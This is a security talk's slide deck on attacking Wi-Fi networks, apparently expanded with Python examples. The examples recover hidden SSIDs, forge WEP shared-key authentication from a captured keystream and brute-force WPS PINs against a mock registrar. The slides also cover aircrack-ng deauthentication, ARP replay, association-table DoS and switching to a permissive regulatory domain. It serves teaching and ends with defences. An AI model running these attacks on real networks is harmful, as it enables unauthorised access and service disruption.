You think your Wifi is Safe? Rob Gillen @argodev
Presented at CodeStock.
Who we are: Wintellect, founded by Jeffrey Richter, Jeff Prosise and John Robbins. Consulting, training, design and debugging services. wintellect.com
Don't Be Stupid
The following presentation describes real attacks on real systems. Please note that most of the attacks described would be considered ILLEGAL if attempted on systems that you do not have explicit permission to test and attack. I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations. Please remember this basic guideline: With knowledge comes responsibility.
Disclaimer
The content of this presentation represents my personal views and thoughts at the present time. This content is not endorsed by, or representative in any way of, my employer, nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.
Overview
• Pre-requisite knowledge
• Various security approaches
• Tools and attacks
Required Gear
• Network adapter (and driver) that supports "monitor" mode
  – Monitor mode captures every 802.11 frame on a channel, including management and control frames, without associating to any network
  – Promiscuous mode on a wired NIC is the closest analogy, but it only gives you Ethernet frames, not the 802.11 headers the attacks below depend on
• Windows, Mac, or Linux
  – Linux tools (the aircrack-ng suite used throughout) tend to be more readily available
Wireless Packet Frames
• Management frames
  – Authentication
  – De-authentication
  – Association Request
  – Association Response
  – Re-association Request
  – Re-association Response
  – Disassociation
  – Beacon
  – Probe Request
  – Probe Response
• Control frames
  – Request to Send (RTS)
  – Clear to Send (CTS)
  – Acknowledgment (ACK)
• Data frames
Packet Sniffing
• Determine the channel of the network we are interested in
  – Required for sniffing data packets: airodump-ng hops across channels by default, so a capture locked to the wrong channel misses most frames
  – airodump-ng lists each BSSID with its channel
• Lock the monitor interface to that channel: iwconfig mon0 channel 11 (demo pre/post)
Packet Injection
• aireplay-ng
  – Injects frames onto a specific wireless network without being associated to it
  – Can target specific channels, spoof (mask) source MAC addresses, etc.
Regulatory Issues
• The regulatory domain decides which channels are available and the allowed radio power levels
  – iw reg set US
  – iw reg set BO (Bolivia, a far more permissive domain)
DEMO: Hidden SSID
• Show a packet capture with the SSID in the beacons
• Hide the SSID on the AP
• Prove it is now hidden (beacons now carry a zero-length SSID element)
• Solve for X: the SSID is still sent in the clear in probe requests/responses and association requests
  – Passive: wait for a valid client to connect, wireshark filter on those frames
  – Active: use aireplay-ng to send a deauthentication packet; the client reconnects and discloses the SSID
• Probe Request / Probe Response packets
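The frame types, the channel lookup and the hidden-SSID recovery from the three slides above, as an added example that is not part of the original presentation. It decodes the 802.11 Frame Control field, walks the tagged parameters of beacons and probe responses (SSID element and DS Parameter Set channel), and matches a beacon that hides its SSID to the probe response the same BSSID sends once a client comes back. The BSSID, SSID and frames are constructed for the demo; nothing here is captured from a real network.

```python
# Added example, not from the original slides: classify raw 802.11 frames,
# read the channel out of a beacon, and recover a "hidden" SSID from the
# probe response the AP sends to a returning client.
import struct

TYPE_NAMES = {0: "management", 1: "control", 2: "data"}
MGMT_SUBTYPES = {
    0: "association request", 1: "association response",
    2: "reassociation request", 3: "reassociation response",
    4: "probe request", 5: "probe response", 8: "beacon",
    10: "disassociation", 11: "authentication", 12: "deauthentication",
}
CTRL_SUBTYPES = {11: "RTS", 12: "CTS", 13: "ACK"}

SSID_ELEMENT = 0        # tagged parameter id for the SSID
DS_PARAMETER_SET = 3    # tagged parameter id carrying the channel number


def frame_kind(frame):
    """Return (type name, subtype name) from the first Frame Control byte."""
    fc = frame[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    names = {0: MGMT_SUBTYPES, 1: CTRL_SUBTYPES}.get(ftype, {})
    return TYPE_NAMES.get(ftype, "reserved"), names.get(subtype, f"subtype {subtype}")


def parse_elements(body):
    """Parse 802.11 tagged parameters (id, length, value) into a dict."""
    elements, i = {}, 0
    while i + 2 <= len(body):
        eid, elen = body[i], body[i + 1]
        elements[eid] = body[i + 2:i + 2 + elen]
        i += 2 + elen
    return elements


def parse_mgmt(frame):
    """Decode BSSID, SSID and channel from a beacon or probe response."""
    subtype = frame_kind(frame)[1]
    bssid = frame[16:22].hex(":")          # addr3 of a management frame
    # 24-byte header, then timestamp(8) + beacon interval(2) + capabilities(2)
    elements = parse_elements(frame[24 + 12:])
    ssid = elements.get(SSID_ELEMENT, b"")
    channel = elements.get(DS_PARAMETER_SET, b"\x00")[0]
    return {
        "subtype": subtype,
        "bssid": bssid,
        "ssid": ssid.decode("utf-8", "replace") or None,  # None == hidden
        "channel": channel,
    }


def build_mgmt(subtype, bssid, ssid, channel):
    """Build a minimal beacon (subtype 8) or probe response (5) for the demo."""
    fc = struct.pack("<H", subtype << 4)   # type bits 00 = management
    header = fc + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    fixed = b"\x00" * 8 + struct.pack("<H", 100) + struct.pack("<H", 0x0411)
    elements = bytes([SSID_ELEMENT, len(ssid)]) + ssid
    elements += bytes([DS_PARAMETER_SET, 1, channel])
    return header + fixed + elements


def reveal_hidden_ssids(frames):
    """Map each BSSID that beacons a hidden SSID to (SSID seen elsewhere, channel)."""
    hidden, revealed = {}, {}
    for f in frames:
        kind, subtype = frame_kind(f)
        if kind != "management" or subtype not in ("beacon", "probe response"):
            continue
        info = parse_mgmt(f)
        if subtype == "beacon" and info["ssid"] is None:
            hidden[info["bssid"]] = info["channel"]
        elif subtype == "probe response" and info["ssid"]:
            revealed[info["bssid"]] = info["ssid"]
    return {b: (revealed.get(b), ch) for b, ch in hidden.items()}


AP = bytes.fromhex("001122aabbcc")  # constructed BSSID for the demo
CAPTURE = [                         # constructed "capture", not real traffic
    build_mgmt(8, AP, b"", 11),           # beacon with the SSID hidden (length 0)
    bytes([0xB4, 0x00]) + b"\x00" * 14,   # RTS control frame, subtype 11
    build_mgmt(5, AP, b"labnet", 11),     # probe response after a client returns
]

if __name__ == "__main__":
    for f in CAPTURE:
        print(frame_kind(f))
    print(reveal_hidden_ssids(CAPTURE))
```

The beacon is the only frame where the AP controls what is disclosed; the probe response and association request carry the SSID verbatim, which is why a single deauthentication of a connected client is enough to recover it.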
DEMO: Shared Key Authentication
• Illustration (diagram from Wikipedia/Netgear)
• Configure the AP for Shared Key authentication and update the client
• Use airodump-ng to capture/log the authentication exchange: the AP's clear-text challenge and the client's WEP-encrypted reply XOR to the RC4 keystream
  – Wait for a valid client or send a deauth packet to force a re-authentication
• Use aireplay-ng to replay the captured keystream against a new challenge and authenticate without the key
• TIP: DoS by filling up the AP's association tables (wrapper around aireplay-ng)
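The keystream recovery behind the Shared Key Authentication demo, as an added example that is not part of the original presentation or of the aircrack-ng tools. The AP's challenge is sent in the clear and the client returns it WEP-encrypted (RC4 under IV||key with a CRC-32 ICV appended), so anyone who captured both frames XORs them to obtain IV||keystream and can answer a fresh challenge with no knowledge of the key. The key, IV and challenge values are constructed for the demo; the RC4/ICV construction is the same one WEP data frames use.

```python
# Added example, not from the original slides: recover the RC4 keystream from
# a captured WEP Shared Key Authentication exchange and use it to forge the
# response to a new challenge. Key, IV and challenges are constructed.
import os
import struct
import zlib


def rc4(key, length):
    """Plain RC4 keystream generator (the stream cipher WEP uses)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext):
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext):
    """WEP: append the ICV, RC4 under IV||key, send IV in the clear."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key, iv_and_ct):
    """What the AP does: decrypt and verify the ICV; None on failure."""
    iv, ct = iv_and_ct[:3], iv_and_ct[3:]
    body = xor(ct, rc4(iv + key, len(ct)))
    plaintext, tag = body[:-4], body[-4:]
    return plaintext if icv(plaintext) == tag else None


# --- the legitimate exchange that airodump-ng records ----------------------
def legitimate_exchange(key, iv, challenge):
    """Frames 2 and 3 of Shared Key Auth: AP challenge, client encrypted reply."""
    return challenge, wep_encrypt(key, iv, challenge)


# --- the attacker, holding only the two captured frames --------------------
def recover_keystream(challenge, response):
    """Known plaintext (challenge + its ICV) XOR ciphertext = keystream."""
    iv, ct = response[:3], response[3:]
    return iv, xor(challenge + icv(challenge), ct)


def forge_response(iv, keystream, new_challenge):
    """Answer a fresh challenge with the captured IV and keystream, no key."""
    return iv + xor(new_challenge + icv(new_challenge), keystream)


def ap_accepts(key, challenge, response):
    """The AP cannot tell a reused IV from a fresh one; it only checks the ICV."""
    return wep_decrypt(key, response) == challenge


def demo(key=b"\x01\x02\x03\x04\x05", iv=b"\x11\x22\x33"):
    """Run the full attack; returns True when the forged auth is accepted."""
    challenge, response = legitimate_exchange(key, iv, os.urandom(128))
    captured_iv, keystream = recover_keystream(challenge, response)
    fresh = os.urandom(128)                    # the AP's next challenge
    forged = forge_response(captured_iv, keystream, fresh)
    return ap_accepts(key, fresh, forged)


if __name__ == "__main__":
    print("forged authentication accepted:", demo())
```

Note that the recovered keystream is 132 bytes (128-byte challenge plus ICV), which is exactly the length needed to encrypt any future 128-byte challenge under the same IV; a real AP never rejects the reused IV.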
DEMO: WEP Encryption
• Capture data packets (ARP) from a known/trusted client (airodump-ng)
• Replay/re-inject them 10-100,000 times (aireplay-ng): every replayed ARP request makes the AP answer with a new frame under a fresh 24-bit IV, which is the material the statistical attack needs
• Crack the collected IVs (aircrack-ng)
• "Guaranteed" crack: with enough IVs the key falls out regardless of its strength
Tools
• Reaver Pro (WPS exploit)
• 4-10 hours and your network is mine: the registrar confirms the two halves of the 8-digit WPS PIN separately, so the PIN falls to an online brute force, and the registrar then hands over the WPA passphrase
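Why the WPS attack is a matter of hours, as an added example that is not part of the original presentation and not Reaver's code. The last digit of a WPS PIN is a checksum over the first seven, and the registrar rejects a wrong first half at message M4 and a wrong second half at M6, so the attacker searches at most 10,000 + 1,000 PINs instead of 10^8. The registrar below is a mock that only reproduces that answer behaviour; the PIN is constructed for the demo.

```python
# Added example, not from the original slides: WPS PIN checksum and the
# split-halves online brute force that Reaver performs against a registrar.
# MockRegistrar stands in for the AP; no real WPS messages are exchanged.


def wps_checksum(first_seven):
    """Checksum digit over the first seven PIN digits (given as an int)."""
    accum = 0
    while first_seven:
        accum += 3 * (first_seven % 10)
        first_seven //= 10
        accum += first_seven % 10
        first_seven //= 10
    return (10 - accum % 10) % 10


def valid_pin(pin):
    """True for an 8-digit PIN whose last digit is the correct checksum."""
    pin = str(pin).zfill(8)
    return pin.isdigit() and len(pin) == 8 and wps_checksum(int(pin[:7])) == int(pin[7])


class MockRegistrar:
    """Mimics a WPS registrar: NACK at M4 if digits 1-4 are wrong, NACK at M6
    if digits 5-8 are wrong, otherwise it proceeds to M7 (the passphrase)."""

    def __init__(self, pin):
        assert valid_pin(pin), "constructed PIN must carry a valid checksum"
        self.pin, self.attempts = str(pin).zfill(8), 0

    def try_pin(self, pin):
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            return "M4-NACK"
        if pin[4:] != self.pin[4:]:
            return "M6-NACK"
        return "M7"


def brute_force(registrar):
    """Recover the PIN half by half: at most 10,000 + 1,000 attempts."""
    # Phase 1: any response other than M4-NACK means the first half is right.
    first = next(half for half in (f"{i:04d}" for i in range(10000))
                 if registrar.try_pin(half + "0000") != "M4-NACK")
    # Phase 2: only 1,000 candidates, since digit 8 is fixed by the checksum.
    for i in range(1000):
        second = f"{i:03d}"
        pin = first + second + str(wps_checksum(int(first + second)))
        if registrar.try_pin(pin) == "M7":
            return pin
    return None


if __name__ == "__main__":
    reg = MockRegistrar("12345670")   # constructed PIN for the demo
    print("recovered:", brute_force(reg), "after", reg.attempts, "attempts")
```

Real registrars answer each attempt in a second or more and many rate-limit after a run of failures, which is where the 4-10 hour figure comes from; the arithmetic above is why it is hours rather than years.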
What is Safe?
• Stop using Wi-Fi
• Avoid open Wi-Fi networks
• Always use SSL/TLS (HTTPS), so that sniffed traffic is useless
• Use a VPN
• Disable auto-connect... on *all* devices
• Long, complex network keys
• WPA-Enterprise / RADIUS / PEAP / EAP-TTLS
• Disable WPS!